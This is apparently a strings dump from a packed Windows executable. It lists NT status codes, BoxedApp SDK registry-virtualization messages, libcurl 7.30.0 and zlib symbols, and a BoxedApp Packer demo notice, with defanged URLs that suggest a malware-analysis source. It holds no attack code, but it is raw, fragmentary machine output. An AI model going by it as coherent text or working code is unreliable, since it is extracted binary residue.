STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
[email protected]
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
<url> malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
PTF.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tPTF.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b<fd:%d>
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: hXXp://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
